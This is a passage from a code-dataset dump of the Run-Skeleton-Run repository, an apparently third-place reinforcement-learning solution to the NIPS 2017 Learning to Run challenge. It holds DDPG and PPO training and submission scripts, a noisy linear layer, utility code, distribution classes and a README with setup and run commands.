copy.deepcopy(critic)\n\n hard_update(target_actor, actor)\n hard_update(target_critic, critic)\n\n target_actor.train()\n critic.train()\n target_actor.share_memory()\n target_critic.share_memory()\n\n _, _, save_fn = act_update_fns(actor, critic, target_actor, target_critic, args)\n\n args.thread = 0\n best_reward = Value(\"f\", 0.0)\n multi_thread(actor, critic, target_actor, target_critic, args, act_update_fns, best_reward)\n\n save_fn()\n\n\nif __name__ == '__main__':\n os.environ['OMP_NUM_THREADS'] = '1'\n torch.set_num_threads(1)\n args = parse_args()\n debug(\n args,\n create_model,\n create_act_update_fns,\n train_multi_thread)\n"
},
{
"alpha_fraction": 0.6219819784164429,
"alphanum_fraction": 0.6455855965614319,
"avg_line_length": 28.838708877563477,
"blob_id": "72e1cb5bccc87b9dbdbece50fa20ba1e8951094a",
"content_id": "e071ae713e49fd091221c4f3410ecf75b28c82fb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5550,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 186,
"path": "/ddpg/submit.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import os\nimport json\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom pprint import pprint\n\nfrom osim.env import RunEnv\nfrom osim.http.client import Client\n\nfrom common.misc_util import boolean_flag, query_yes_no\nfrom common.env_wrappers import create_observation_handler, create_action_handler, create_env\n\nfrom ddpg.train import str2params, activations\nfrom ddpg.model import create_model, create_act_update_fns\n\n\nREMOTE_BASE = 'http://grader.crowdai.org:1729'\nACTION_SHAPE = 18\nSEEDS = [\n 3834825972, 3049289152, 3538742899, 2904257823, 4011088434,\n 2684066875, 781202090, 1691535473, 898088606, 1301477286\n]\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--restore-args-from', type=str, default=None)\n parser.add_argument('--restore-actor-from', type=str, default=None)\n parser.add_argument('--restore-critic-from', type=str, default=None)\n\n parser.add_argument('--max-obstacles', type=int, default=3)\n parser.add_argument('--num-episodes', type=int, default=1)\n parser.add_argument('--token', type=str, default=None)\n\n boolean_flag(parser, \"visualize\", default=False)\n boolean_flag(parser, \"submit\", default=False)\n\n return parser.parse_args()\n\n\ndef restore_args(args):\n with open(args.restore_args_from, \"r\") as fin:\n params = json.load(fin)\n\n unwanted = [\n \"max_obstacles\",\n \"restore_args_from\",\n \"restore_actor_from\",\n \"restore_critic_from\"\n ]\n\n for unwanted_key in unwanted:\n value = params.pop(unwanted_key, None)\n if value is not None:\n del value\n\n for key, value in params.items():\n setattr(args, key, value)\n return args\n\n\ndef submit(actor, critic, args, act_update_fn):\n act_fn, _, _ = act_update_fn(actor, critic, None, None, args)\n\n client = Client(REMOTE_BASE)\n\n all_episode_metrics = []\n\n episode_metrics = {\n \"reward\": 0.0,\n \"step\": 0,\n }\n\n observation_handler = create_observation_handler(args)\n action_handler = create_action_handler(args)\n observation = client.env_create(args.token)\n action = np.zeros(ACTION_SHAPE, dtype=np.float32)\n observation = observation_handler(observation, action)\n\n submitted = False\n while not submitted:\n print(episode_metrics[\"reward\"])\n action = act_fn(observation)\n\n observation, reward, done, _ = client.env_step(action_handler(action).tolist())\n\n episode_metrics[\"reward\"] += reward\n episode_metrics[\"step\"] += 1\n\n if done:\n all_episode_metrics.append(episode_metrics)\n\n episode_metrics = {\n \"reward\": 0.0,\n \"step\": 0,\n }\n\n observation_handler = create_observation_handler(args)\n action_handler = create_action_handler(args)\n observation = client.env_create(args.token)\n\n if not observation:\n submitted = True\n break\n\n action = np.zeros(ACTION_SHAPE, dtype=np.float32)\n observation = observation_handler(observation, action)\n else:\n observation = observation_handler(observation, action)\n\n df = pd.DataFrame(all_episode_metrics)\n pprint(df.describe())\n\n if query_yes_no(\"Submit?\"):\n client.submit()\n\n\ndef test(actor, critic, args, act_update_fn):\n act_fn, _, _ = act_update_fn(actor, critic, None, None, args)\n env = RunEnv(visualize=args.visualize, max_obstacles=args.max_obstacles)\n\n all_episode_metrics = []\n for episode in range(args.num_episodes):\n episode_metrics = {\n \"reward\": 0.0,\n \"step\": 0,\n }\n\n observation_handler = create_observation_handler(args)\n action_handler = create_action_handler(args)\n 
observation = env.reset(difficulty=2, seed=SEEDS[episode % len(SEEDS)])\n action = np.zeros(ACTION_SHAPE, dtype=np.float32)\n observation = observation_handler(observation, action)\n\n done = False\n while not done:\n print(episode_metrics[\"reward\"])\n action = act_fn(observation)\n\n observation, reward, done, _ = env.step(action_handler(action))\n\n episode_metrics[\"reward\"] += reward\n episode_metrics[\"step\"] += 1\n\n if done:\n break\n\n observation = observation_handler(observation, action)\n\n all_episode_metrics.append(episode_metrics)\n\n df = pd.DataFrame(all_episode_metrics)\n pprint(df.describe())\n\n\ndef submit_or_test(args, model_fn, act_update_fn, submit_fn, test_fn):\n args = restore_args(args)\n env = create_env(args)\n\n args.n_action = env.action_space.shape[0]\n args.n_observation = env.observation_space.shape[0]\n\n args.actor_layers = str2params(args.actor_layers)\n args.critic_layers = str2params(args.critic_layers)\n\n args.actor_activation = activations[args.actor_activation]\n args.critic_activation = activations[args.critic_activation]\n\n actor, critic = model_fn(args)\n actor.load_state_dict(torch.load(args.restore_actor_from))\n critic.load_state_dict(torch.load(args.restore_critic_from))\n\n if args.submit:\n submit_fn(actor, critic, args, act_update_fn)\n else:\n test_fn(actor, critic, args, act_update_fn)\n\n\nif __name__ == '__main__':\n os.environ['OMP_NUM_THREADS'] = '1'\n torch.set_num_threads(1)\n args = parse_args()\n submit_or_test(args, create_model, create_act_update_fns, submit, test)\n"
},
{
"alpha_fraction": 0.5934696197509766,
"alphanum_fraction": 0.6001994013786316,
"avg_line_length": 42.60869598388672,
"blob_id": "4c199d54f5f754b2c851730b92cf50a2995a1314",
"content_id": "c9e33a640a474b7e56ab7e8e378e8408121aae29",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4012,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 92,
"path": "/common/modules/NoisyLinear.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import math\n\nimport torch\nfrom torch.nn.parameter import Parameter\nimport torch.nn.functional as F\nfrom torch.nn.modules.module import Module\nfrom torch.autograd import Variable\n\n\nclass NoisyLinear(Module):\n \"\"\"Applies a noisy linear transformation to the incoming data:\n :math:`y = (mu_w + sigma_w \\cdot epsilon_w)x + mu_b + sigma_b \\cdot epsilon_b`\n More details can be found in the paper `Noisy Networks for Exploration` _ .\n Args:\n in_features: size of each input sample\n out_features: size of each output sample\n bias: If set to False, the layer will not learn an additive bias. Default: True\n factorised: whether or not to use factorised noise. Default: True\n std_init: initialization constant for standard deviation component of weights. If None,\n defaults to 0.017 for independent and 0.4 for factorised. Default: None\n Shape:\n - Input: :math:`(N, in\\_features)`\n - Output: :math:`(N, out\\_features)`\n Attributes:\n weight: the learnable weights of the module of shape (out_features x in_features)\n bias: the learnable bias of the module of shape (out_features)\n Examples::\n >>> m = nn.NoisyLinear(20, 30)\n >>> input = autograd.Variable(torch.randn(128, 20))\n >>> output = m(input)\n >>> print(output.size())\n \"\"\"\n\n def __init__(self, in_features, out_features, bias=True, factorised=True, std_init=None):\n super(NoisyLinear, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.factorised = factorised\n self.weight_mu = Parameter(torch.Tensor(out_features, in_features))\n self.weight_sigma = Parameter(torch.Tensor(out_features, in_features))\n if bias:\n self.bias_mu = Parameter(torch.Tensor(out_features))\n self.bias_sigma = Parameter(torch.Tensor(out_features))\n else:\n self.register_parameter('bias', None)\n if not std_init:\n if self.factorised:\n self.std_init = 0.4\n else:\n self.std_init = 0.017\n else:\n self.std_init = std_init\n self.reset_parameters(bias)\n\n def reset_parameters(self, bias):\n if self.factorised:\n mu_range = 1. / math.sqrt(self.weight_mu.size(1))\n self.weight_mu.data.uniform_(-mu_range, mu_range)\n self.weight_sigma.data.fill_(self.std_init / math.sqrt(self.weight_sigma.size(1)))\n if bias:\n self.bias_mu.data.uniform_(-mu_range, mu_range)\n self.bias_sigma.data.fill_(self.std_init / math.sqrt(self.bias_sigma.size(0)))\n else:\n mu_range = math.sqrt(3. / self.weight_mu.size(1))\n self.weight_mu.data.uniform_(-mu_range, mu_range)\n self.weight_sigma.data.fill_(self.std_init)\n if bias:\n self.bias_mu.data.uniform_(-mu_range, mu_range)\n self.bias_sigma.data.fill_(self.std_init)\n\n def scale_noise(self, size):\n x = torch.Tensor(size).normal_()\n x = x.sign().mul(x.abs().sqrt())\n return x\n\n def forward(self, input):\n if self.factorised:\n epsilon_in = self.scale_noise(self.in_features)\n epsilon_out = self.scale_noise(self.out_features)\n weight_epsilon = Variable(epsilon_out.ger(epsilon_in))\n bias_epsilon = Variable(self.scale_noise(self.out_features))\n else:\n weight_epsilon = Variable(torch.Tensor(self.out_features, self.in_features).normal_())\n bias_epsilon = Variable(torch.Tensor(self.out_features).normal_())\n return F.linear(input,\n self.weight_mu + self.weight_sigma.mul(weight_epsilon),\n self.bias_mu + self.bias_sigma.mul(bias_epsilon))\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' \\\n + str(self.in_features) + ' -> ' \\\n + str(self.out_features) + ')'\n"
},
{
"alpha_fraction": 0.6398399472236633,
"alphanum_fraction": 0.6731880903244019,
"avg_line_length": 24.269662857055664,
"blob_id": "610bfbcb8029868c14fc8f164e70e634ffca082f",
"content_id": "9829210bbc7f155cabcf8d07f61aadfe64f347d4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2249,
"license_type": "permissive",
"max_line_length": 186,
"num_lines": 89,
"path": "/README.md",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "# Run-Skeleton-Run\n\n[Reason8.ai](https://reason8.ai) PyTorch solution for 3rd place [NIPS RL 2017 challenge](https://www.crowdai.org/challenges/nips-2017-learning-to-run/leaderboards?challenge_round_id=12).\n\n[Theano version](https://github.com/fgvbrt/nips_rl)\n\nAdditional thanks to [Mikhail Pavlov](https://github.com/fgvbrt) for collaboration.\n\n## Agent policies\n\n### no-flip-state-action\n\n\n\n### flip-state-action\n\n\n\n\n## How to setup environment?\n\n1. `sh setup_conda.sh`\n2. `source activate opensim-rl`\n\nWould like to test baselines? (Need MPI support)\n\n3. `sudo apt-get install openmpi-bin openmpi-doc libopenmpi-dev`\n3+. `sh setup_env_mpi.sh`\n\nOR like DDPG agents?\n3. `sh setup_env.sh`\n\n4. Congrats! Now you are ready to check our agents.\n\n\n## Run DDPG agent\n\n```\nCUDA_VISIBLE_DEVICES=\"\" PYTHONPATH=. python ddpg/train.py \\\n --logdir ./logs_ddpg \\\n --num-threads 4 \\\n --ddpg-wrapper \\\n --skip-frames 5 \\\n --fail-reward -0.2 \\\n --reward-scale 10 \\\n --flip-state-action \\\n --actor-layers 64-64 --actor-layer-norm --actor-parameters-noise \\\n --actor-lr 0.001 --actor-lr-end 0.00001 \\\n --critic-layers 64-32 --critic-layer-norm \\\n --critic-lr 0.002 --critic-lr-end 0.00001 \\\n --initial-epsilon 0.5 --final-epsilon 0.001 \\\n --tau 0.0001\n```\n\n\n## Evaluate DDPG agent\n\n```\nCUDA_VISIBLE_DEVICES=\"\" PYTHONPATH=./ python ddpg/submit.py \\\n --restore-actor-from ./logs_ddpg/actor_state_dict.pkl \\\n --restore-critic-from ./logs_ddpg/critic_state_dict.pkl \\\n --restore-args-from ./logs_ddpg/args.json \\\n --num-episodes 10\n\n```\n\n\n## Run TRPO/PPO agent\n\n```\nCUDA_VISIBLE_DEVICES=\"\" PYTHONPATH=. python ddpg/train.py \\\n --agent ppo \\\n --logdir ./logs_baseline \\\n --baseline-wrapper \\\n --skip-frames 5 \\\n --fail-reward -0.2 \\\n --reward-scale 10\n```\n\n## Citation\nPlease cite the following paper if you feel this repository useful.\n```\n@article{run_skeleton,\n title={Run, skeleton, run: skeletal model in a physics-based simulation},\n author = {Mikhail Pavlov, Sergey Kolesnikov and Sergey M.~Plis},\n journal={AAAI Spring Symposium Series},\n year={2018}\n}\n```\n"
},
{
"alpha_fraction": 0.5974599123001099,
"alphanum_fraction": 0.6049465537071228,
"avg_line_length": 42.74269104003906,
"blob_id": "c200ef345929c6afbcc06f371e58619fd3cfee92",
"content_id": "2823db4c519562b5ca555801d1b7b53f060105be",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7480,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 171,
"path": "/baselines/ppo.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nimport numpy as np\nimport time\nfrom mpi4py import MPI\nfrom collections import deque\nfrom contextlib import contextmanager\n\nfrom common.logger import Logger\nfrom baselines.baselines_common import Dataset, explained_variance, fmt_row, zipsame\nimport baselines.baselines_common.tf_util as U\nfrom baselines.baselines_common.mpi_adam import MpiAdam\nfrom baselines.baselines_common.mpi_saver import MpiSaver\nfrom baselines.baselines_common.mpi_moments import mpi_moments\n\nfrom baselines.trajectories import traj_segment_generator, add_vtarg_and_adv\n\n\ndef learn(env, policy_func, args, *,\n timesteps_per_batch, # timesteps per actor per update\n clip_param, entcoeff, # clipping parameter epsilon, entropy coeff\n optim_epochs, optim_stepsize, optim_batchsize, # optimization hypers\n gamma, lam, # advantage estimation\n adam_epsilon=1e-5,\n schedule='constant'): # annealing for stepsize parameters (epsilon and adam),\n # Setup losses and stuff\n # ----------------------------------------\n ob_space = env.observation_space\n ac_space = env.action_space\n pi = policy_func(\"pi\", ob_space, ac_space) # Construct network for new policy\n oldpi = policy_func(\"oldpi\", ob_space, ac_space) # Network for old policy\n atarg = tf.placeholder(dtype=tf.float32,\n shape=[None]) # Target advantage function (if applicable)\n ret = tf.placeholder(dtype=tf.float32, shape=[None]) # Empirical return\n\n lrmult = tf.placeholder(name='lrmult', dtype=tf.float32,\n shape=[]) # learning rate multiplier, updated with schedule\n clip_param = clip_param * lrmult # Annealed cliping parameter epislon\n\n ob = U.get_placeholder_cached(name=\"ob\")\n ac = pi.pdtype.sample_placeholder([None])\n\n kloldnew = oldpi.pd.kl(pi.pd)\n ent = pi.pd.entropy()\n meankl = U.mean(kloldnew)\n meanent = U.mean(ent)\n pol_entpen = (-entcoeff) * meanent\n\n ratio = tf.exp(pi.pd.logp(ac) - oldpi.pd.logp(ac)) # pnew / pold\n surr1 = ratio * atarg # surrogate from conservative policy iteration\n surr2 = U.clip(ratio, 1.0 - clip_param, 1.0 + clip_param) * atarg #\n pol_surr = - U.mean(tf.minimum(surr1, surr2)) # PPO's pessimistic surrogate (L^CLIP)\n vf_loss = U.mean(tf.square(pi.vpred - ret))\n total_loss = pol_surr + pol_entpen + vf_loss\n losses = [pol_surr, pol_entpen, vf_loss, meankl, meanent]\n loss_names = [\"pol_surr\", \"pol_entpen\", \"vf_loss\", \"kl\", \"ent\"]\n\n var_list = pi.get_trainable_variables()\n lossandgrad = U.function([ob, ac, atarg, ret, lrmult],\n losses + [U.flatgrad(total_loss, var_list)])\n adam = MpiAdam(var_list, epsilon=adam_epsilon)\n policy_var_list = [v for v in var_list if v.name.split(\"/\")[0].startswith(\"pi\")]\n saver = MpiSaver(policy_var_list, log_prefix=args.logdir)\n\n assign_old_eq_new = U.function([], [], updates=[tf.assign(oldv, newv)\n for (oldv, newv) in\n zipsame(oldpi.get_variables(),\n pi.get_variables())])\n compute_losses = U.function([ob, ac, atarg, ret, lrmult], losses)\n\n U.initialize()\n saver.restore(restore_from=args.restore_actor_from)\n adam.sync()\n\n # Prepare for rollouts\n # ----------------------------------------\n seg_gen = traj_segment_generator(pi, env, args, timesteps_per_batch, stochastic=True)\n\n episodes_so_far = 0\n timesteps_so_far = 0\n iters_so_far = 0\n tstart = time.time()\n lenbuffer = deque(maxlen=100) # rolling buffer for episode lengths\n rewbuffer = deque(maxlen=100) # rolling buffer for episode rewards\n\n # max_timesteps = 1e10\n cur_lrmult = 1.0\n\n args.logdir = \"{}/thread_{}\".format(args.logdir, args.thread)\n 
logger = Logger(args.logdir)\n\n while time.time() - tstart < 86400 * args.max_train_days:\n # if schedule == 'constant':\n # cur_lrmult = 1.0\n # elif schedule == 'linear':\n # cur_lrmult = max(1.0 - float(timesteps_so_far) / max_timesteps, 0)\n # else:\n # raise NotImplementedError\n\n # logger.log(\"********** Iteration %i ************\" % iters_so_far)\n\n seg = seg_gen.__next__()\n add_vtarg_and_adv(seg, gamma, lam)\n\n # ob, ac, atarg, ret, td1ret = map(np.concatenate, (obs, acs, atargs, rets, td1rets))\n ob, ac, atarg, tdlamret = seg[\"ob\"], seg[\"ac\"], seg[\"adv\"], seg[\"tdlamret\"]\n vpredbefore = seg[\"vpred\"] # predicted value function before udpate\n atarg = (atarg - atarg.mean()) / atarg.std() # standardized advantage function estimate\n d = Dataset(dict(ob=ob, ac=ac, atarg=atarg, vtarg=tdlamret), shuffle=True)\n optim_batchsize = optim_batchsize or ob.shape[0]\n\n if hasattr(pi, \"ob_rms\"): pi.ob_rms.update(ob) # update running mean/std for policy\n\n assign_old_eq_new() # set old parameter values to new parameter values\n # logger.log(\"Optimizing...\")\n # logger.log(fmt_row(13, loss_names))\n # Here we do a bunch of optimization epochs over the data\n for _ in range(optim_epochs):\n losses = [] # list of tuples, each of which gives the loss for a minibatch\n for batch in d.iterate_once(optim_batchsize):\n *newlosses, g = lossandgrad(batch[\"ob\"], batch[\"ac\"], batch[\"atarg\"],\n batch[\"vtarg\"], cur_lrmult)\n adam.update(g, optim_stepsize * cur_lrmult)\n losses.append(newlosses)\n # logger.log(fmt_row(13, np.mean(losses, axis=0)))\n\n saver.sync()\n # logger.log(\"Evaluating losses...\")\n losses = []\n for batch in d.iterate_once(optim_batchsize):\n newlosses = compute_losses(batch[\"ob\"], batch[\"ac\"], batch[\"atarg\"], batch[\"vtarg\"],\n cur_lrmult)\n losses.append(newlosses)\n meanlosses, _, _ = mpi_moments(losses, axis=0)\n # logger.log(fmt_row(13, meanlosses))\n\n lrlocal = (seg[\"ep_lens\"], seg[\"ep_rets\"]) # local values\n listoflrpairs = MPI.COMM_WORLD.allgather(lrlocal) # list of tuples\n lens, rews = map(flatten_lists, zip(*listoflrpairs))\n lenbuffer.extend(lens)\n rewbuffer.extend(rews)\n\n episodes_so_far += len(lens)\n timesteps_so_far += sum(lens)\n iters_so_far += 1\n\n # Logging\n logger.scalar_summary(\"episodes\", len(lens), iters_so_far)\n\n for (lossname, lossval) in zip(loss_names, meanlosses):\n logger.scalar_summary(lossname, lossval, episodes_so_far)\n\n logger.scalar_summary(\"ev_tdlam_before\", explained_variance(vpredbefore, tdlamret), episodes_so_far)\n\n logger.scalar_summary(\"step\", np.mean(lenbuffer), episodes_so_far)\n logger.scalar_summary(\"reward\", np.mean(rewbuffer), episodes_so_far)\n logger.scalar_summary(\"best reward\", np.max(rewbuffer), episodes_so_far)\n\n elapsed_time = time.time() - tstart\n\n logger.scalar_summary(\n \"episode per minute\",\n episodes_so_far / elapsed_time * 60,\n episodes_so_far)\n logger.scalar_summary(\n \"step per second\",\n timesteps_so_far / elapsed_time,\n episodes_so_far)\n\n\ndef flatten_lists(listoflists):\n return [el for list_ in listoflists for el in list_]\n"
},
{
"alpha_fraction": 0.6709359884262085,
"alphanum_fraction": 0.6729063987731934,
"avg_line_length": 26.432432174682617,
"blob_id": "7e5c15814bf3a5a21c00a8856cacc003251299fb",
"content_id": "88f64dd16e45199f8673ba2d64f5689dba689fe5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1015,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 37,
"path": "/common/torch_util.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import torch\nfrom torch.autograd import Variable\n\nUSE_CUDA = torch.cuda.is_available()\nFLOAT = torch.cuda.FloatTensor if USE_CUDA else torch.FloatTensor\n\n\ndef to_numpy(var):\n return var.cpu().data.numpy() if USE_CUDA else var.data.numpy()\n\n\ndef to_tensor(ndarray, volatile=False, requires_grad=False, dtype=FLOAT):\n return Variable(\n torch.from_numpy(ndarray), volatile=volatile, requires_grad=requires_grad\n ).type(dtype)\n\n\ndef soft_update(target, source, tau):\n for target_param, param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(\n target_param.data * (1.0 - tau) + param.data * tau\n )\n\n\ndef hard_update(target, source):\n for target_param, param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(param.data)\n\n\nactivations = {\n \"relu\": torch.nn.ReLU,\n \"elu\": torch.nn.ELU,\n \"leakyrelu\": torch.nn.LeakyReLU,\n \"selu\": torch.nn.SELU,\n \"sigmoid\": torch.nn.Sigmoid,\n \"tanh\": torch.nn.Tanh\n}\n"
},
{
"alpha_fraction": 0.5914661288261414,
"alphanum_fraction": 0.6061006784439087,
"avg_line_length": 29.087533950805664,
"blob_id": "d7460e47caf321fda26e0269d74fd1d0d04c2d89",
"content_id": "1d42559a94c5dc064b6a17a19eaf7ca6756f66fb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11343,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 377,
"path": "/baselines/baselines_common/distributions.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nimport numpy as np\nimport baselines.baselines_common.tf_util as U\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import nn\n\n\nclass Pd(object):\n \"\"\"\n A particular probability distribution\n \"\"\"\n\n def flatparam(self):\n raise NotImplementedError\n\n def mode(self):\n raise NotImplementedError\n\n def neglogp(self, x):\n # Usually it's easier to define the negative logprob\n raise NotImplementedError\n\n def kl(self, other):\n raise NotImplementedError\n\n def entropy(self):\n raise NotImplementedError\n\n def sample(self):\n raise NotImplementedError\n\n def logp(self, x):\n return - self.neglogp(x)\n\n\nclass PdType(object):\n \"\"\"\n Parametrized family of probability distributions\n \"\"\"\n\n def pdclass(self):\n raise NotImplementedError\n\n def pdfromflat(self, flat):\n return self.pdclass()(flat)\n\n def param_shape(self):\n raise NotImplementedError\n\n def sample_shape(self):\n raise NotImplementedError\n\n def sample_dtype(self):\n raise NotImplementedError\n\n def param_placeholder(self, prepend_shape, name=None):\n return tf.placeholder(dtype=tf.float32, shape=prepend_shape + self.param_shape(), name=name)\n\n def sample_placeholder(self, prepend_shape, name=None):\n return tf.placeholder(dtype=self.sample_dtype(), shape=prepend_shape + self.sample_shape(),\n name=name)\n\n\nclass CategoricalPdType(PdType):\n def __init__(self, ncat):\n self.ncat = ncat\n\n def pdclass(self):\n return CategoricalPd\n\n def param_shape(self):\n return [self.ncat]\n\n def sample_shape(self):\n return []\n\n def sample_dtype(self):\n return tf.int32\n\n\nclass MultiCategoricalPdType(PdType):\n def __init__(self, low, high):\n self.low = low\n self.high = high\n self.ncats = high - low + 1\n\n def pdclass(self):\n return MultiCategoricalPd\n\n def pdfromflat(self, flat):\n return MultiCategoricalPd(self.low, self.high, flat)\n\n def param_shape(self):\n return [sum(self.ncats)]\n\n def sample_shape(self):\n return [len(self.ncats)]\n\n def sample_dtype(self):\n return tf.int32\n\n\nclass DiagGaussianPdType(PdType):\n def __init__(self, size):\n self.size = size\n\n def pdclass(self):\n return DiagGaussianPd\n\n def param_shape(self):\n return [2 * self.size]\n\n def sample_shape(self):\n return [self.size]\n\n def sample_dtype(self):\n return tf.float32\n\n\nclass BernoulliPdType(PdType):\n def __init__(self, size):\n self.size = size\n\n def pdclass(self):\n return BernoulliPd\n\n def param_shape(self):\n return [self.size]\n\n def sample_shape(self):\n return [self.size]\n\n def sample_dtype(self):\n return tf.int32\n\n\n# WRONG SECOND DERIVATIVES\n# class CategoricalPd(Pd):\n# def __init__(self, logits):\n# self.logits = logits\n# self.ps = tf.nn.softmax(logits)\n# @classmethod\n# def fromflat(cls, flat):\n# return cls(flat)\n# def flatparam(self):\n# return self.logits\n# def mode(self):\n# return U.argmax(self.logits, axis=-1)\n# def logp(self, x):\n# return -tf.nn.sparse_softmax_cross_entropy_with_logits(self.logits, x)\n# def kl(self, other):\n# return tf.nn.softmax_cross_entropy_with_logits(other.logits, self.ps) \\\n# - tf.nn.softmax_cross_entropy_with_logits(self.logits, self.ps)\n# def entropy(self):\n# return tf.nn.softmax_cross_entropy_with_logits(self.logits, self.ps)\n# def sample(self):\n# u = tf.random_uniform(tf.shape(self.logits))\n# return U.argmax(self.logits - tf.log(-tf.log(u)), axis=-1)\n\nclass CategoricalPd(Pd):\n def __init__(self, logits):\n self.logits = logits\n\n def flatparam(self):\n return 
self.logits\n\n def mode(self):\n return U.argmax(self.logits, axis=-1)\n\n def neglogp(self, x):\n # return tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.logits, labels=x)\n # Note: we can't use sparse_softmax_cross_entropy_with_logits because\n # the implementation does not allow second-order derivatives...\n one_hot_actions = tf.one_hot(x, self.logits.get_shape().as_list()[-1])\n return tf.nn.softmax_cross_entropy_with_logits(\n logits=self.logits,\n labels=one_hot_actions)\n\n def kl(self, other):\n a0 = self.logits - U.max(self.logits, axis=-1, keepdims=True)\n a1 = other.logits - U.max(other.logits, axis=-1, keepdims=True)\n ea0 = tf.exp(a0)\n ea1 = tf.exp(a1)\n z0 = U.sum(ea0, axis=-1, keepdims=True)\n z1 = U.sum(ea1, axis=-1, keepdims=True)\n p0 = ea0 / z0\n return U.sum(p0 * (a0 - tf.log(z0) - a1 + tf.log(z1)), axis=-1)\n\n def entropy(self):\n a0 = self.logits - U.max(self.logits, axis=-1, keepdims=True)\n ea0 = tf.exp(a0)\n z0 = U.sum(ea0, axis=-1, keepdims=True)\n p0 = ea0 / z0\n return U.sum(p0 * (tf.log(z0) - a0), axis=-1)\n\n def sample(self):\n u = tf.random_uniform(tf.shape(self.logits))\n return tf.argmax(self.logits - tf.log(-tf.log(u)), axis=-1)\n\n @classmethod\n def fromflat(cls, flat):\n return cls(flat)\n\n\nclass MultiCategoricalPd(Pd):\n def __init__(self, low, high, flat):\n self.flat = flat\n self.low = tf.constant(low, dtype=tf.int32)\n self.categoricals = list(\n map(CategoricalPd, tf.split(flat, high - low + 1, axis=len(flat.get_shape()) - 1)))\n\n def flatparam(self):\n return self.flat\n\n def mode(self):\n return self.low + tf.cast(tf.stack([p.mode() for p in self.categoricals], axis=-1),\n tf.int32)\n\n def neglogp(self, x):\n return tf.add_n([p.neglogp(px) for p, px in zip(\n self.categoricals, tf.unstack(x - self.low,\n axis=len(x.get_shape()) - 1))])\n\n def kl(self, other):\n return tf.add_n([\n p.kl(q) for p, q in zip(self.categoricals, other.categoricals)\n ])\n\n def entropy(self):\n return tf.add_n([p.entropy() for p in self.categoricals])\n\n def sample(self):\n return self.low + tf.cast(tf.stack([p.sample() for p in self.categoricals], axis=-1),\n tf.int32)\n\n @classmethod\n def fromflat(cls, flat):\n raise NotImplementedError\n\n\nclass DiagGaussianPd(Pd):\n def __init__(self, flat):\n self.flat = flat\n mean, logstd = tf.split(axis=len(flat.shape) - 1, num_or_size_splits=2, value=flat)\n self.mean = mean\n self.logstd = logstd\n self.std = tf.exp(logstd)\n\n def flatparam(self):\n return self.flat\n\n def mode(self):\n return self.mean\n\n def neglogp(self, x):\n return 0.5 * U.sum(tf.square((x - self.mean) / self.std), axis=-1) \\\n + 0.5 * np.log(2.0 * np.pi) * tf.to_float(tf.shape(x)[-1]) \\\n + U.sum(self.logstd, axis=-1)\n\n def kl(self, other):\n assert isinstance(other, DiagGaussianPd)\n return U.sum(other.logstd - self.logstd + (\n tf.square(self.std) + tf.square(self.mean - other.mean)) / (\n 2.0 * tf.square(other.std)) - 0.5, axis=-1)\n\n def entropy(self):\n return U.sum(self.logstd + .5 * np.log(2.0 * np.pi * np.e), axis=-1)\n\n def sample(self):\n return self.mean + self.std * tf.random_normal(tf.shape(self.mean))\n\n @classmethod\n def fromflat(cls, flat):\n return cls(flat)\n\n\nclass BernoulliPd(Pd):\n def __init__(self, logits):\n self.logits = logits\n self.ps = tf.sigmoid(logits)\n\n def flatparam(self):\n return self.logits\n\n def mode(self):\n return tf.round(self.ps)\n\n def neglogp(self, x):\n return U.sum(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=self.logits, labels=tf.to_float(x)),\n axis=-1)\n\n 
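# KL(p||q) computed as H(p, q) - H(p) using sigmoid cross-entropy terms\n    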
def kl(self, other):\n return U.sum(tf.nn.sigmoid_cross_entropy_with_logits(logits=other.logits, labels=self.ps),\n axis=-1) - U.sum(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=self.logits, labels=self.ps), axis=-1)\n\n def entropy(self):\n return U.sum(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.logits, labels=self.ps),\n axis=-1)\n\n def sample(self):\n u = tf.random_uniform(tf.shape(self.ps))\n return tf.to_float(math_ops.less(u, self.ps))\n\n @classmethod\n def fromflat(cls, flat):\n return cls(flat)\n\n\ndef make_pdtype(ac_space):\n from gym import spaces\n if isinstance(ac_space, spaces.Box):\n assert len(ac_space.shape) == 1\n return DiagGaussianPdType(ac_space.shape[0])\n elif isinstance(ac_space, spaces.Discrete):\n return CategoricalPdType(ac_space.n)\n elif isinstance(ac_space, spaces.MultiDiscrete):\n return MultiCategoricalPdType(ac_space.low, ac_space.high)\n elif isinstance(ac_space, spaces.MultiBinary):\n return BernoulliPdType(ac_space.n)\n else:\n raise NotImplementedError\n\n\ndef shape_el(v, 